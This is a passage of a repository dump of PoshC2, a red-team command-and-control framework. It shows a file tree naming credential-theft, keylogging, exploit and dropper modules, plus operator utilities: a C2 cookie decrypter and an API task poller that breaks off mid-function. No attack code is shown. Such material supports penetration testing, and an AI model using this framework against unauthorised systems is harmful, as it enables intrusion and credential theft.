├── .github ├── ISSUE_TEMPLATE │ ├── bug_report.md │ └── feature_request.md └── workflows │ ├── docker-image.yml │ └── docker-publish.yml ├── .gitignore ├── Dockerfile ├── Install-for-Docker.sh ├── Install.sh ├── LICENSE ├── Pipfile ├── README.md ├── cookie_decrypter.py ├── poll.py ├── poshc2-ansible-main.yml ├── poshc2 ├── Utils.py ├── __init__.py ├── client │ ├── Alias.py │ ├── Opsec.py │ ├── __init__.py │ ├── cli │ │ ├── AutosuggestionAggregator.py │ │ ├── CommandPromptCompleter.py │ │ ├── PoshExamplesAutosuggestions.py │ │ └── __init__.py │ ├── command_handlers │ │ ├── CommandTags.py │ │ ├── CommonCommands.py │ │ ├── FCommHandler.py │ │ ├── ImplantHandler.py │ │ ├── JxaHandler.py │ │ ├── LinuxHandler.py │ │ ├── PBindHandler.py │ │ ├── PSHandler.py │ │ ├── PyHandler.py │ │ ├── SharpHandler.py │ │ ├── UnmanagedWindowsHandler.py │ │ └── __init__.py │ └── reporting │ │ ├── CSV.py │ │ ├── HTML.py │ │ ├── ReportColumns.py │ │ ├── ReportKeys.py │ │ └── __init__.py └── server │ ├── AutoLoads.py │ ├── C2Server.py │ ├── Cert.py │ ├── Config.py │ ├── Core.py │ ├── ImplantExtensions.py │ ├── ImplantType.py │ ├── Pipelines.py │ ├── PowerStatus.py │ ├── Tasks.py │ ├── UrlConfig.py │ ├── __init__.py │ ├── database │ ├── Helpers.py │ ├── Model.py │ └── __init__.py │ └── payloads │ ├── JS-Payloads.py │ ├── Linux.py │ ├── Macro-Payloads.py │ ├── Payloads.py │ ├── XOR-Payloads.py │ └── __init__.py ├── resources ├── SharpSocks │ └── SharpSocksServer.zip ├── beacon-data │ ├── cat.png │ ├── d.png │ ├── dog.png │ ├── fb.jpg │ ├── fg.png │ ├── i.png │ ├── in.png │ ├── paw.png │ ├── pn.png │ └── we.gif ├── config-template.yml ├── html-templates │ ├── autoruns.html │ ├── c2view.html │ ├── components │ │ ├── autocomplete.html │ │ ├── c2_message_logs.html │ │ ├── commands_form.html │ │ ├── implant_tasks.html │ │ └── implants_table.html │ ├── files.html │ ├── header.html │ ├── home.html │ ├── include │ │ ├── css │ │ │ ├── bootstrap-icons.min.css │ │ │ ├── bootstrap.min.css │ │ │ └── fonts 
│ │ │ │ ├── bootstrap-icons.woff │ │ │ │ └── bootstrap-icons.woff2 │ │ ├── img │ │ │ ├── logo-for-dark.webp │ │ │ └── logo-for-light.webp │ │ └── js │ │ │ └── jquery.min.js │ ├── payloads.html │ ├── reports.html │ └── tasksview.html ├── images │ ├── PoshC2Logo.png │ ├── ReportLogo.png │ ├── firewall.png │ └── implant.png ├── mitre-mapping.yml ├── modules │ ├── Brute-AD.ps1 │ ├── Brute-LocAdmin.ps1 │ ├── Bypass-UAC.ps1 │ ├── CSharp-OracleClient.exe │ ├── CVE-2016-9192.ps1 │ ├── Certify.exe │ ├── ConvertTo-Shellcode.ps1 │ ├── Cred-Popper.ps1 │ ├── DNSResolve.exe │ ├── Daisy.dll │ ├── Decrypt-RDCMan.ps1 │ ├── Dump-NTDS.ps1 │ ├── Echo.exe │ ├── EventLogSearcher.exe │ ├── Exploit-EternalBlue.ps1 │ ├── FComm.exe │ ├── FileGrep.exe │ ├── Get-ComputerInfo.ps1 │ ├── Get-CreditCardData.ps1 │ ├── Get-FirewallRules.ps1 │ ├── Get-GPPAutologon.ps1 │ ├── Get-GPPPassword.ps1 │ ├── Get-Hash.ps1 │ ├── Get-IPConfig.ps1 │ ├── Get-IdleTime.ps1 │ ├── Get-InjectedThread.ps1 │ ├── Get-InjectedThreads.ps1 │ ├── Get-Keystrokes.ps1 │ ├── Get-LAPSPasswords.ps1 │ ├── Get-LocAdm.ps1 │ ├── Get-MSHotFixes.ps1 │ ├── Get-Netstat.ps1 │ ├── Get-PassNotExp.ps1 │ ├── Get-PassPol.ps1 │ ├── Get-ProcessList.ps1 │ ├── Get-RecentFiles.ps1 │ ├── Get-ServicePerms.ps1 │ ├── Get-System.ps1 │ ├── Get-TokenElevationType.ps1 │ ├── Get-UserInfo.ps1 │ ├── Get-UserLogons.ps1 │ ├── Get-WLANPass.ps1 │ ├── GetCreds.exe │ ├── GetInstallerInfo.exe │ ├── HealthInspector.js │ ├── HostEnum.ps1 │ ├── IPConfigCS.exe │ ├── IncidentReponseToolkit.ps1 │ ├── IncidentResponseToolkit.exe │ ├── Inject-Shellcode.ps1 │ ├── InternalMonologue.exe │ ├── Inveigh-Relay.ps1 │ ├── Inveigh.exe │ ├── Inveigh.ps1 │ ├── Invoke-Arpscan.ps1 │ ├── Invoke-DCSync.ps1 │ ├── Invoke-DaisyChain.ps1 │ ├── Invoke-EDRChecker.ps1 │ ├── Invoke-EventVwrBypass.ps1 │ ├── Invoke-Hostscan.ps1 │ ├── Invoke-InveighUnprivileged.ps1 │ ├── Invoke-Kerberoast.ps1 │ ├── Invoke-MS16-032-Proxy.ps1 │ ├── Invoke-MS16-032.ps1 │ ├── Invoke-Mimikatz.ps1 │ ├── Invoke-PSInject.ps1 
│ ├── Invoke-Pbind.ps1 │ ├── Invoke-Pipekat.ps1 │ ├── Invoke-Portscan.ps1 │ ├── Invoke-PowerDump.ps1 │ ├── Invoke-PsExec.ps1 │ ├── Invoke-PsUACme.ps1 │ ├── Invoke-ReflectivePEInjection.ps1 │ ├── Invoke-ReverseDnsLookup.ps1 │ ├── Invoke-RunAs.ps1 │ ├── Invoke-SMBClient.ps1 │ ├── Invoke-SMBExec.ps1 │ ├── Invoke-Sharp.ps1 │ ├── Invoke-Shellcode.ps1 │ ├── Invoke-Sniffer.ps1 │ ├── Invoke-SqlQuery.ps1 │ ├── Invoke-Tater.ps1 │ ├── Invoke-TheHash.ps1 │ ├── Invoke-TokenManipulation.ps1 │ ├── Invoke-URLCheck.ps1 │ ├── Invoke-WMIChecker.ps1 │ ├── Invoke-WMICommand.ps1 │ ├── Invoke-WMIEvent.ps1 │ ├── Invoke-WMIExec.ps1 │ ├── Invoke-WScriptBypassUAC.ps1 │ ├── Invoke-WinRMSession.ps1 │ ├── KeePassConfig.ps1 │ ├── KeeThief.ps1 │ ├── LockLess.exe │ ├── LoggedOnUsers.exe │ ├── Logger.exe │ ├── MiniDump.ps1 │ ├── NamedPipe.ps1 │ ├── NamedPipeDaisy.ps1 │ ├── NamedPipeProxy.ps1 │ ├── Net-GPPPassword.exe │ ├── New-JScriptShell.ps1 │ ├── OFs │ │ ├── adcs_enum.x64.o │ │ ├── adcs_enum.x86.o │ │ ├── adcs_enum_com.x64.o │ │ ├── adcs_enum_com.x86.o │ │ ├── adcs_enum_com2.x64.o │ │ ├── adcs_enum_com2.x86.o │ │ ├── adv_audit_policies.x64.o │ │ ├── adv_audit_policies.x86.o │ │ ├── arp.x64.o │ │ ├── arp.x86.o │ │ ├── cacls.x64.o │ │ ├── cacls.x86.o │ │ ├── demo_bof.x64.o │ │ ├── demo_bof.x86.o │ │ ├── dir.x64.o │ │ ├── dir.x86.o │ │ ├── driversigs.x64.o │ │ ├── driversigs.x86.o │ │ ├── enum_filter_driver.x64.o │ │ ├── enum_filter_driver.x86.o │ │ ├── enumlocalsessions.x64.o │ │ ├── enumlocalsessions.x86.o │ │ ├── env.x64.o │ │ ├── env.x86.o │ │ ├── findLoadedModule.x64.o │ │ ├── findLoadedModule.x86.o │ │ ├── get-netsession.x64.o │ │ ├── get-netsession.x86.o │ │ ├── get_password_policy.x64.o │ │ ├── get_password_policy.x86.o │ │ ├── inlineExecute-Assemblyx64.o │ │ ├── ipconfig.x64.o │ │ ├── ipconfig.x86.o │ │ ├── ldapsearch.x64.o │ │ ├── ldapsearch.x86.o │ │ ├── listdns.x64.o │ │ ├── listdns.x86.o │ │ ├── listmods.x64.o │ │ ├── listmods.x86.o │ │ ├── locale.x64.o │ │ ├── locale.x86.o │ │ ├── 
netgroup.x64.o │ │ ├── netgroup.x86.o │ │ ├── netlocalgroup.x64.o │ │ ├── netlocalgroup.x86.o │ │ ├── netshares.x64.o │ │ ├── netshares.x86.o │ │ ├── netstat.x64.o │ │ ├── netstat.x86.o │ │ ├── netuse.x64.o │ │ ├── netuse.x86.o │ │ ├── netuser.x64.o │ │ ├── netuser.x86.o │ │ ├── netuserenum.x64.o │ │ ├── netuserenum.x86.o │ │ ├── netview.x64.o │ │ ├── netview.x86.o │ │ ├── nonpagedldapsearch.x64.o │ │ ├── nonpagedldapsearch.x86.o │ │ ├── notepad.x64.o │ │ ├── notepad.x86.o │ │ ├── nslookup.x64.o │ │ ├── nslookup.x86.o │ │ ├── probe.x64.o │ │ ├── probe.x86.o │ │ ├── reg_query.x64.o │ │ ├── reg_query.x86.o │ │ ├── resources.x64.o │ │ ├── resources.x86.o │ │ ├── routeprint.x64.o │ │ ├── routeprint.x86.o │ │ ├── sc_enum.x64.o │ │ ├── sc_enum.x86.o │ │ ├── sc_qc.x64.o │ │ ├── sc_qc.x86.o │ │ ├── sc_qdescription.x64.o │ │ ├── sc_qdescription.x86.o │ │ ├── sc_qfailure.x64.o │ │ ├── sc_qfailure.x86.o │ │ ├── sc_qtriggerinfo.x64.o │ │ ├── sc_qtriggerinfo.x86.o │ │ ├── sc_query.x64.o │ │ ├── sc_query.x86.o │ │ ├── schtasksenum.x64.o │ │ ├── schtasksenum.x86.o │ │ ├── schtasksquery.x64.o │ │ ├── schtasksquery.x86.o │ │ ├── tasklist.x64.o │ │ ├── tasklist.x86.o │ │ ├── uptime.x64.o │ │ ├── uptime.x86.o │ │ ├── vssenum.x64.o │ │ ├── vssenum.x86.o │ │ ├── whoami.x64.o │ │ ├── whoami.x86.o │ │ ├── windowlist.x64.o │ │ ├── windowlist.x86.o │ │ ├── wmi_query.x64.o │ │ └── wmi_query.x86.o │ ├── Orchard.js │ ├── Out-Minidump.ps1 │ ├── PBind.exe │ ├── PEs │ │ ├── ATPMiniDump.exe │ │ ├── JuicyPotato.exe │ │ ├── MS-RPRN.exe │ │ ├── NetMan-Dll.exe │ │ ├── SpoolSample.exe │ │ ├── UACME.txt │ │ ├── mimikatz.exe │ │ └── net.exe │ ├── PGrabber.dll │ ├── PS.exe │ ├── PassTheCert.exe │ ├── PingCS.exe │ ├── PortScanner.dll │ ├── PortScanner.ps1 │ ├── PowerUp.ps1 │ ├── PowerUpSQL.ps1 │ ├── PowerUpSQL_Full.ps1 │ ├── PowerView_dev.ps1 │ ├── Powermad.ps1 │ ├── PrivescCheck.ps1 │ ├── PwrStatusTracker.dll │ ├── RegSave.exe │ ├── Rubeus.exe │ ├── RunAs-NetOnly.ps1 │ ├── RunAs.exe │ ├── RunOF-Debug.exe 
│ ├── RunOF.exe │ ├── RunPE-Debug.exe │ ├── RunPE.exe │ ├── RunasCs.exe │ ├── SExec.exe │ ├── SQLQuery.exe │ ├── SSLInspectionCheck.ps1 │ ├── SafetyDump.exe │ ├── SafetyKatz.exe │ ├── SchTasks.exe │ ├── Screenshot-AllWindows.ps1 │ ├── Screenshot.dll │ ├── Screenshot.ps1 │ ├── Seatbelt.exe │ ├── Seatbelt.ps1 │ ├── Service-Perms.ps1 │ ├── Set-LHSTokenPrivilege.ps1 │ ├── SharPersist.exe │ ├── SharpApplocker.exe │ ├── SharpCOM.exe │ ├── SharpChrome.exe │ ├── SharpChromium.exe │ ├── SharpCookieMonster.exe │ ├── SharpCreateProc.exe │ ├── SharpDPAPI.exe │ ├── SharpDump.exe │ ├── SharpEDRChecker.exe │ ├── SharpEdge.exe │ ├── SharpFTP.exe │ ├── SharpHound.exe │ ├── SharpHound.ps1 │ ├── SharpLogger.exe │ ├── SharpPrintNightmare.exe │ ├── SharpPrinter.exe │ ├── SharpProcessList.exe │ ├── SharpReg.exe │ ├── SharpRoast.exe │ ├── SharpSC.exe │ ├── SharpSC2.exe │ ├── SharpSSDP.exe │ ├── SharpService.exe │ ├── SharpShadowCopy.exe │ ├── SharpShares.exe │ ├── SharpSniper.exe │ ├── SharpSocksImplant.exe │ ├── SharpSploit.dll │ ├── SharpTask.exe │ ├── SharpTelnet.exe │ ├── SharpUp.exe │ ├── SharpView.exe │ ├── SharpWMI.exe │ ├── SharpWSUS.exe │ ├── SharpWeb.exe │ ├── Sherlock.ps1 │ ├── Shhmon.exe │ ├── Sitrep.exe │ ├── Stage2-Core.exe │ ├── Stage2-Core.ps1 │ ├── StandIn.exe │ ├── Steal_token.exe │ ├── StickyNotesExtract.exe │ ├── SweetPotato.exe │ ├── SwiftBelt.js │ ├── SyscallsExtractor.exe │ ├── Test-ADCredential.ps1 │ ├── TestProxy.ps1 │ ├── Unhooker.ps1 │ ├── WExec.exe │ ├── Watson.exe │ ├── Zippy.ps1 │ ├── clipboard.exe │ ├── clipboard_monitor.js │ ├── cred-popper.js │ ├── dcom.exe │ ├── linuxprivchecker.py │ ├── powercat.ps1 │ ├── powerview.ps1 │ └── token.exe ├── payload-templates │ ├── DotNet2JS.js │ ├── DynamicCode.cs │ ├── Implant-Core.js │ ├── Implant-Core.ps1 │ ├── Implant-Core.py │ ├── Sharp_Powershell_Runner.cs │ ├── Sharp_v2_x64_Shellcode.b64 │ ├── Sharp_v2_x64_dll.b64 │ ├── Sharp_v2_x86_Shellcode.b64 │ ├── Sharp_v2_x86_dll.b64 │ ├── Sharp_v4_x64_Shellcode.b64 │ ├── 
Sharp_v4_x64_dll.b64 │ ├── Sharp_v4_x86_Shellcode.b64 │ ├── Sharp_v4_x86_dll.b64 │ ├── System.Management.Automation.dll │ ├── Unmanaged_x64_Shellcode.b64 │ ├── Unmanaged_x86_Shellcode.b64 │ ├── aes.py │ ├── csc.cs │ ├── dropper │ ├── dropper.c │ ├── dropper.cs │ ├── dropper.hta │ ├── dropper.js │ ├── dropper.macro │ ├── dropper.ps1 │ ├── dropper.py │ ├── dropper.xor │ ├── dropper_cs.sct │ ├── dropper_jxa.js │ ├── dropper_migrate.c │ ├── dropper_rg.sct │ ├── fcomm.cs │ ├── msbuild.xml │ ├── pbind.cs │ ├── pbind.ps1 │ ├── sharp-dropper │ │ ├── AssemblyLoading.cs │ │ ├── Comms.cs │ │ ├── Config.cs │ │ ├── ERROR_CODES.txt │ │ ├── Encryption.cs │ │ ├── FileComms.cs │ │ ├── HttpComms.cs │ │ ├── Internals.cs │ │ ├── NamedPipeComms.cs │ │ ├── Program.cs │ │ ├── Properties │ │ │ └── AssemblyInfo.cs │ │ ├── README.md │ │ ├── Utils.cs │ │ ├── sharp_dropper.csproj │ │ └── sharp_dropper.sln │ └── stage2core.so ├── reporting │ └── HTML_Template.html ├── responses │ ├── 200_response1.html │ ├── 200_response2.html │ ├── 200_response3.html │ ├── 200_response4.html │ ├── 200_response5.html │ ├── 200_response6.html │ └── 404_response.html ├── scripts │ ├── PoshC2.psm1 │ ├── _posh-common │ ├── fpc │ ├── fpc.py │ ├── posh │ ├── posh-api-server │ ├── posh-config │ ├── posh-cookie-decrypter │ ├── posh-docker │ ├── posh-docker-build │ ├── posh-docker-clean │ ├── posh-docker-debug │ ├── posh-docker-server │ ├── posh-docker-stop-server │ ├── posh-log │ ├── posh-project │ ├── posh-server │ ├── posh-service │ ├── posh-service-ansible │ ├── posh-stop-service │ ├── posh-update │ ├── poshc2.api.service │ └── poshc2.service ├── urls.txt └── wordlist.txt ├── start.py ├── start_api.py └── tests ├── __init__.py └── test_utils.py /.github/ISSUE_TEMPLATE/bug_report.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Bug report 3 | about: Create a report to help us improve 4 | title: "[BUG]" 5 | labels: bug 6 | assignees: '' 7 | 8 | --- 9 | 10 | ## 
Description 11 | 12 | A clear and concise description of what the bug is. 13 | 14 | ## Execution Environment: 15 | **All of this must be filled in** 16 | Data | Value 17 | ------ | ------ 18 | Full Posh version (all the text between the === at the top of the Implant Handler) | 19 | OS & version | 20 | Using Docker/containerisation? | 21 | 22 | ## Implant Info 23 | * What implant does the problem occur on? PowerShell/C#/Python 24 | * How was the implant created? Running a default payload? Inject-shellcode? Custom payload? 25 | 26 | ## Defensive Technologies 27 | * Is the target environment running any particular defensive products? AVs/EDRs etc? 28 | 29 | ## To Reproduce 30 | Steps to reproduce the behavior: 31 | 1. Go to '...' 32 | 2. Click on '....' 33 | 3. Scroll down to '....' 34 | 4. See error 35 | 36 | ## Expected behavior 37 | A clear and concise description of what you expected to happen. 38 | 39 | ## Screenshots 40 | If applicable, add screenshots to help explain your problem. 41 | 42 | ## Attach files if required 43 | 44 | ## Additional context 45 | 46 | Add any other context about the problem here. 47 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/feature_request.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Feature request 3 | about: Suggest an idea for this project 4 | title: "[FEATURE]" 5 | labels: enhancement 6 | assignees: '' 7 | 8 | --- 9 | 10 | ## Is your feature request related to a problem? Please describe. 11 | 12 | A clear and concise description of what the problem is. Ex. I'm always frustrated when [...] 13 | 14 | ## Describe the solution you'd like 15 | A clear and concise description of what you want to happen. 16 | 17 | ## Describe alternatives you've considered 18 | A clear and concise description of any alternative solutions or features you've considered. 
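
## Additional context
Add any other context, files or screenshots about the feature request here.

--------------------------------------------------------------------------------
/.github/workflows/docker-image.yml:
--------------------------------------------------------------------------------
name: Docker Image CI

on:
  push:

    # Publish `master` as Docker `latest` image.
    branches:
      - master
      - dev

    # Publish `v1.2.3` tags as releases.
    tags:
      - v*

# Least privilege for the job's GITHUB_TOKEN: this workflow only reads the
# checkout; the registry push authenticates with the Docker Hub secrets, not
# with the token, so nothing beyond contents:read is needed.
permissions:
  contents: read

jobs:

  push_to_registry:

    name: Push Docker image to Docker Hub
    runs-on: ubuntu-latest

    steps:
      - name: Check out the repo
        # NOTE(review): a mutable major tag resolves to whatever the action
        # author publishes next. For a pipeline that handles registry
        # credentials, pin third-party actions to a full commit SHA (same for
        # docker/build-push-action below).
        uses: actions/checkout@v2
      - name: Push to Docker Hub
        uses: docker/build-push-action@v1
        with:
          username: ${{ secrets.DOCKER_USERNAME }}
          password: ${{ secrets.DOCKER_PASSWORD }}
          repository: m0rv4i/poshc2
          tag_with_ref: true
--------------------------------------------------------------------------------
/.github/workflows/docker-publish.yml:
--------------------------------------------------------------------------------
name: Docker

on:
  push:

    # Publish `master` as Docker `latest` image.
    branches:
      - master

    # Publish `v1.2.3` tags as releases.
    tags:
      - v*

env:
  # TODO: Change variable to your image's name.
  IMAGE_NAME: poshc2

# The job reads the checkout and pushes a package with GITHUB_TOKEN; grant
# exactly those two scopes rather than the default token permissions.
permissions:
  contents: read
  packages: write

jobs:
  push:

    runs-on: ubuntu-latest
    if: github.event_name == 'push'

    steps:
      # NOTE(review): pin to a full commit SHA rather than a mutable major tag.
      - uses: actions/checkout@v2

      - name: Build image
        run: docker build . --file Dockerfile --tag $IMAGE_NAME

      - name: Log into registry
        # NOTE(review): docker.pkg.github.com is the legacy GitHub Packages
        # Docker registry; newer images are normally published to ghcr.io.
        # Left unchanged here because the image path format differs.
        run: echo "${{ secrets.GITHUB_TOKEN }}" | docker login docker.pkg.github.com -u ${{ github.actor }} --password-stdin

      - name: Push image
        # Context values are handed to the script through environment
        # variables instead of being spliced into it with ${{ }}, so the shell
        # never parses them as code.
        env:
          GH_REF: ${{ github.ref }}
          GH_REPOSITORY: ${{ github.repository }}
        run: |
          IMAGE_ID=docker.pkg.github.com/$GH_REPOSITORY/$IMAGE_NAME

          # Change all uppercase to lowercase
          IMAGE_ID=$(echo "$IMAGE_ID" | tr '[A-Z]' '[a-z]')

          # Strip git ref prefix from version
          VERSION=$(echo "$GH_REF" | sed -e 's,.*/\(.*\),\1,')

          # Strip "v" prefix from tag name
          [[ "$GH_REF" == "refs/tags/"* ]] && VERSION=$(echo "$VERSION" | sed -e 's/^v//')

          # Use Docker `latest` tag convention
          [ "$VERSION" == "master" ] && VERSION=latest

          echo IMAGE_ID=$IMAGE_ID
          echo VERSION=$VERSION

          docker tag "$IMAGE_NAME" "$IMAGE_ID:$VERSION"
          docker push "$IMAGE_ID:$VERSION"
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
# Byte-compiled / optimized / DLL files
__pycache__/
*.py[cod]
*$py.class
*.pyc
# C extensions
*.so

# Distribution / packaging
.Python
env/
build/
develop-eggs/
dist/
downloads/
eggs/
.eggs/
lib/
lib64/
parts/
sdist/
var/
*.egg-info/
.installed.cfg
*.egg

# Backup files
*.bak

# PyInstaller
# Usually these files are written by a python script from a template
# before PyInstaller builds the exe, so as to inject date/other infos into it.
*.manifest
*.spec

# Installer logs
pip-log.txt
pip-delete-this-directory.txt

# Unit test / coverage reports
htmlcov/
.tox/
.coverage
.coverage.*
.cache
nosetests.xml
coverage.xml
*,cover
.hypothesis/

# Translations
*.mo
*.pot

# Django stuff:
*.log
local_settings.py

# Flask stuff:
instance/
.webassets-cache

# Scrapy stuff:
.scrapy

# Sphinx documentation
docs/_build/

# PyBuilder
target/

# IPython Notebook
.ipynb_checkpoints

# pyenv
.python-version

# celery beat schedule file
celerybeat-schedule

# dotenv
.env

# virtualenv
venv/
ENV/

# vim backup
*.swp

# Spyder project settings
.spyderproject

# Rope project settings
.ropeproject

# VSCode
.vscode/

# VStudio
.vs/

.pytest_cache/
# NOTE(review): the Pipfile declares almost every runtime dependency as "*";
# with the lock file ignored, installs are not reproducible and pick up
# whatever PyPI serves at install time. Committing Pipfile.lock is the usual fix.
Pipfile.lock
resources/modules/*.txt

*.DotSettings.user
resources/SharpSocks/SharpSocksServer/
--------------------------------------------------------------------------------
/Dockerfile:
--------------------------------------------------------------------------------
# From the Kali Linux base image
# NOTE(review): kali-rolling is a floating tag, so image builds are not
# reproducible and silently track whatever upstream publishes.
FROM kalilinux/kali-rolling

# Install PoshC2
# COPY rather than ADD: for a local directory the two behave the same, and
# COPY has no URL-fetch or archive-extraction semantics to reason about.
COPY . /opt/PoshC2
RUN /opt/PoshC2/Install.sh
# Presumably re-copies the tree after Install.sh has modified it — confirm.
# The repository tree on this page has no .dockerignore, so the whole checkout
# (including any local .git and config) is copied into the image.
COPY . /opt/PoshC2

# Working directory
WORKDIR /opt/PoshC2
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
BSD 3-Clause License

Copyright (c) 2020, Nettitude

All rights reserved.

Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:

* Redistributions of source code must retain the above copyright notice, this
  list of conditions and the following disclaimer.

* Redistributions in binary form must reproduce the above copyright notice,
  this list of conditions and the following disclaimer in the documentation
  and/or other materials provided with the distribution.

* Neither the name of the copyright holder nor the names of its
  contributors may be used to endorse or promote products derived from
  this software without specific prior written permission.

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.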
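--------------------------------------------------------------------------------
/Pipfile:
--------------------------------------------------------------------------------
[[source]]
name = "pypi"
url = "https://pypi.org/simple"
verify_ssl = true

[dev-packages]
pytest = "*"
pycodestyle = "*"
autopep8 = "*"
pylint = "*"
rope = "*"

[packages]
# NOTE(review): every runtime dependency except SQLAlchemy is an unpinned "*"
# range, and Pipfile.lock is listed in .gitignore, so two installs of the same
# commit can resolve to different package versions. Commit the lock file or
# pin the ranges here.
pandas = "*"
prompt-toolkit = "*"
pycryptodome = "*"
psycopg2-binary = "*"
pyOpenSSL = "*"
PyYAML = "*"
IPy = "*"
pefile = "*"
python-jenkins = "*"
tzlocal = "*"
jenkins = "*"
rich = "*"
SQLAlchemy = "==1.4.41"
numpy = "*"
wheel = "*"
setuptools = "*"
typing_extensions = "*"
flask = "*"
flask-httpauth = "*"
flask-restx = "*"
werkzeug = "*"
--------------------------------------------------------------------------------
/cookie_decrypter.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
"""Recover the plaintext of a PoshC2 SessionID cookie value.

Takes exactly one argument. If it names a readable file, every line containing
``SessionID=`` is treated as a log line and the value after the marker is
tried; otherwise the argument itself is treated as the cookie value. The key
is read from the C2Server table of the PoshC2 database.
"""

import re
import sys

from poshc2 import Colours
from poshc2.server.Core import decrypt
from poshc2.server.database.Helpers import select_first
from poshc2.server.database.Model import C2Server


def decrypt_and_print(key, encrypted):
    """Try to decrypt ``encrypted`` with ``key``; print and exit 0 on success.

    On failure a message is printed and the function returns so the caller can
    try further candidates. The key value itself is no longer echoed: it is the
    server's encryption key, and terminal output routinely ends up in shell
    history, logs and screenshots.
    """
    try:
        decrypted = decrypt(key, encrypted)
    except Exception:
        # decrypt() is expected to raise on a wrong key or malformed input;
        # any failure just means "not this candidate".
        print(f"{Colours.RED}[-] Failed to decrypt candidate value{Colours.END}")
        return
    print(f"{Colours.GREEN}[+] Success\n\t{decrypted}{Colours.END}")
    sys.exit(0)


def main():
    """Resolve the key from the database and decrypt the single argument."""
    if len(sys.argv) != 2:
        # The argument placeholders were missing from the original usage text;
        # the two accepted forms are described by main's file-then-value logic.
        print("Usage: From pipenv shell in PoshC2 directory -> python3 cookie-decrypter.py <log_file>")
        print("Usage: From pipenv shell in PoshC2 directory -> python3 cookie-decrypter.py <cookie_value>")
        sys.exit(0)

    key = select_first(C2Server.encryption_key)

    if not key:
        print(f"{Colours.RED}[-] Could not get key from database{Colours.END}")
        sys.exit(1)

    arg = sys.argv[1]

    try:
        # errors="replace": a log file with stray bytes must not abort the scan.
        log_file = open(arg, "r", encoding="utf-8", errors="replace")
    except OSError:
        # Not a readable file, so the argument is taken to be the cookie value.
        print(f"[*] Decrypting cookie value {arg}")
        decrypt_and_print(key, arg)
        print(f"{Colours.RED}[-] Failed to decrypt cookie value{Colours.END}")
        return

    with log_file:
        print(f"[*] Checking file {arg}")
        for line in log_file:
            # Only lines that carry a value after the marker are candidates.
            # The original split("SessionID=")[1] raised IndexError on a line
            # containing a bare "SessionID", which then fell through to the
            # cookie-value branch with the file path as the "cookie".
            if "SessionID=" not in line:
                continue
            encrypted = line.split("SessionID=", 1)[1].strip()
            decrypt_and_print(key, encrypted)

    print(f"{Colours.RED}[-] Failed to find and decrypt cookie{Colours.END}")


if __name__ == "__main__":
    main()
--------------------------------------------------------------------------------
/poll.py:
--------------------------------------------------------------------------------
"""Poll the PoshC2 API for tasks issued by one operator and print them.

Connection settings keep the original defaults but can be overridden through
the environment variables named below (introduced here), so a real password
never has to be committed to this file.
"""

import os
import time

import requests

# Configuration
BASE_URL = os.environ.get("POSHC2_API_URL", "http://localhost:5000")
USERNAME = os.environ.get("POSHC2_API_USERNAME", "poshc2")
PASSWORD = os.environ.get("POSHC2_API_PASSWORD", "change_on_install")
FILTER_USERNAME = os.environ.get("POSHC2_FILTER_USERNAME", "bt")  # The username to filter tasks by
TASKS_ENDPOINT = f"{BASE_URL}/tasks"
TASK_ENDPOINT = f"{BASE_URL}/task"
POLL_INTERVAL = 5  # Poll every 5 seconds when no task is found
REQUEST_TIMEOUT = 30  # seconds; without a timeout a stalled server hangs the poller forever
# HTTP Basic auth sends the password in clear on every request; the default
# URL is plain http on localhost only. Point BASE_URL at https for anything
# that leaves the host.
AUTH = (USERNAME, PASSWORD)


def get_latest_task_id():
    """Return the highest task id reported by the API, or 0 if it cannot be read.

    Queries ``/tasks/1`` — presumably the most recent page/entry (confirm
    against the API) — and takes the ``id`` of the first element. Any network
    error, non-200 status, non-JSON body or non-numeric id yields 0 so polling
    simply starts from the beginning.
    """
    try:
        response = requests.get(f"{TASKS_ENDPOINT}/1", auth=AUTH, timeout=REQUEST_TIMEOUT)
    except requests.RequestException:
        return 0
    if response.status_code != 200:
        return 0
    try:
        tasks = response.json()
    except ValueError:
        return 0
    if not isinstance(tasks, list) or not tasks or not isinstance(tasks[0], dict):
        return 0
    task_id = tasks[0].get("id")
    if task_id is None:
        return 0
    try:
        return int(task_id)
    except (TypeError, ValueError):
        return 0


def get_task_by_id(task_id):
    """Return the task dict for ``task_id`` once it has completed, else None.

    A task that exists but has no ``completed_time`` yet is reported as None,
    so the caller keeps re-polling the same id until the task completes.
    """
    try:
        response = requests.get(f"{TASK_ENDPOINT}/{task_id}", auth=AUTH, timeout=REQUEST_TIMEOUT)
    except requests.RequestException:
        return None
    if response.status_code != 200:
        return None
    try:
        task = response.json()
    except ValueError:
        return None
    # isinstance guard: the original called .get() on whatever JSON came back.
    if isinstance(task, dict) and task.get("completed_time") is not None:
        return task
    return None


def format_task(task, status):
    """Format the task details for printing.

    ``status`` is ``"sent"`` (header plus the command) or ``"returned"``
    (header plus the output); any other value yields an empty string.
    """
    task_id = f"Task {int(task.get('id', 0)):05d}"  # Format task ID as 5-digit
    operator = task.get("user", "Unknown")
    implant = task.get("implant_numeric_id", "Unknown")
    output = task.get("output")
    # The first output line serves as the "context" label. Guard the
    # empty-list case: output consisting only of newlines made
    # splitlines()[0] raise IndexError in the original.
    output_lines = output.splitlines() if output else []
    context = output_lines[0] if output_lines else "Unknown Context"
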